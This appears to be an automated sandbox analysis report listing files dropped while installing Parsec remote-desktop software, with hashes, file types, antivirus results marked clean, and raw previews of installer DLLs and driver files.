                              C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl

                              Download File
                              Process:C:\Windows\System32\runonce.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):2.0857798938129686
                              Encrypted:false
                              SSDEEP:384:jw82APUHhWDORJ9lhvIf5cVamJ6vX7bQVDKYJxK5vXL9lnI8r1O2ArLoKYcUCzr9:jW
                              MD5:4BACF4A9E591C0B98AD556E8BF432977
                              SHA1:921525E23C3D7496E4D21B8490AC8A9DA2DAF5F0
                              SHA-256:94570FD3C177B0AE607FF6BAD1B36224C79390C481E46CEFEB07F783E0AB2F96
                              SHA-512:7C0C7D1954137F46B35114BABC420EFA0C0E7BCA2FAB9DF50ADF7825A71E7F6E94253B13485927A8BA65035806041249CD380CBF1A5CDCEA3313195AAE93B214
                              Malicious:false
                              Preview:. ........................................................................................QL............. ......eJ......-C,.:6..Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................P9~............m...:6..........E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.E.x.p.l.o.r.e.r.\.E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...e.t.l...........P.P.........VuQL............................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\is-4VCD0.tmp\_isetup\_setup64.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp

                              Download File
                              Process:C:\Users\user\Desktop\uu8v4UUzTU.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3220480
                              Entropy (8bit):6.3129799359419705
                              Encrypted:false
                              SSDEEP:49152:Odx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoHVHNTQTEjy333zmgS:vHDYsqiPRhINnq95FoHVBy333CB
                              MD5:828B7D7624C14BE1F3D8122F6E2FAC53
                              SHA1:1E51B52B0E6AA39BB4C465767E5131B99E39CAB2
                              SHA-256:6F28DFB808D325740AE9189598AD4AB2D7E2B77293DCFBB7A6B00AC852B719DF
                              SHA-512:E83136F55417D0AD0748A78FAA7E9C88885520B4B596ACA51B70F3816D21FD71112A0BD1E6968FB8CB22E5C3956B3BA0A5D20DACFC54F1EEF3EAB5FC7661DDCB
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................B,.........`V,......`,...@...........................2...........@......@....................-.......-..9............................................................-.......................-.......-......................text.....,.......,................. ..`.itext...(...0,..*....,............. ..`.data........`,......F,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-...... -.............@..@.rsrc................"-.............@..@..............1.......0.............@..@........................................................

                              C:\Users\user\AppData\Local\Temp\nscF857.tmp\System.dll

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nscF857.tmp\nsExec.dll

                              Download File
                              Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):5.298362543684714
                              Encrypted:false
                              SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                              MD5:675C4948E1EFC929EDCABFE67148EDDD
                              SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                              SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                              SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nstD696.tmp\System.dll

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nstD696.tmp\UserInfo.dll

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.3422620069068625
                              Encrypted:false
                              SSDEEP:48:qKDBQE7F4aBr1wH8l9QIXTZShMmj3jkCTbGr7X:5WkFZruHSXTH6jkCnGr7X
                              MD5:2F69AFA9D17A5245EC9B5BB03D56F63C
                              SHA1:E0A133222136B3D4783E965513A690C23826AEC9
                              SHA-256:E54989D2B83E7282D0BEC56B098635146AAB5D5A283F1F89486816851EF885A0
                              SHA-512:BFD4AF50E41EBC56E30355C722C2A55540A5BBDDB68F1522EF7AABFE4F5F2A20E87FA9677EE3CDB3C0BF5BD3988B89D1224D32C9F23342A16E46C542D8DC0926
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L...!.Oa...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dll

                              Download File
                              Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):5.298362543684714
                              Encrypted:false
                              SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                              MD5:675C4948E1EFC929EDCABFE67148EDDD
                              SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                              SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                              SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nsvA814.tmp\ApplicationID.dll

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):200704
                              Entropy (8bit):6.552977186185562
                              Encrypted:false
                              SSDEEP:3072:2pBNN6AmU9cDlKd3P6V9nSm49WTgKg4Fa1V3FuXRAuAg0FubA9cVsL+73:2pzxmQ3yL+9MgKbxAOEXY
                              MD5:A858C1A57E32485505B1977CF0A125BE
                              SHA1:25D86C4B51F7CC10FC70E3A0493A39C4460CC350
                              SHA-256:1462A072345E86318B981089B08B613A34027DDF527BFB66606C683F218FC3B4
                              SHA-512:32B597FC2412A9407FD12AC77C556FF9740F1DD0D2055426D11A7BAF21B09C536A84CFB97865B4E94168656514E7CE71EB2BC4122AA340100F4CE483BAD1722D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......;.....Q..Q..Q.@SQs.Q.@QQ..Q.@PQb.QD..Pj.QD..PN.QD..P_.Q.#lQ~.Q.#iQv.Q..Q..Q.P~.Q.P~.Q.]Q~.Q..5Q~.Q.P~.QRich..Q........................PE..L.....sX...........!.........2...............................................p............@.................................d...d....0..P....................@..| ......p...........................`...@...............X............................text...c........................... ..`.rdata..<...........................@..@.data...(...........................@....gfids..............................@..@.tls......... ......................@....rsrc...P....0......................@..@.reloc..| ...@..."..................@..B........................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nsvA814.tmp\System.dll

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.814115788739565
                              Encrypted:false
                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                              MD5:CFF85C549D536F651D4FB8387F1976F2
                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsDialogs.dll

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):9728
                              Entropy (8bit):5.158136237602734
                              Encrypted:false
                              SSDEEP:96:o0svUu3Uy+sytcS8176b+XR8pCHFcMcxSgB5PKtAtgt+Nt+rnt3DVEB3YcNqkzfS:o0svWyNO81b8pCHFcM0PuAgkOyuIFc
                              MD5:6C3F8C94D0727894D706940A8A980543
                              SHA1:0D1BCAD901BE377F38D579AAFC0C41C0EF8DCEFD
                              SHA-256:56B96ADD1978B1ABBA286F7F8982B0EFBE007D4A48B3DED6A4D408E01D753FE2
                              SHA-512:2094F0E4BB7C806A5FF27F83A1D572A5512D979EEFDA3345BAFF27D2C89E828F68466D08C3CA250DA11B01FC0407A21743037C25E94FBE688566DD7DEAEBD355
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....Oa...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsExec.dll

                              Download File
                              Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):5.298362543684714
                              Encrypted:false
                              SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                              MD5:675C4948E1EFC929EDCABFE67148EDDD
                              SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                              SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                              SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCB0.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                              C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCC0.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                              C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCF0.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                              C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.cat (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                              C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                              C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.sys (copy)

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                              C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE76E.tmp

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
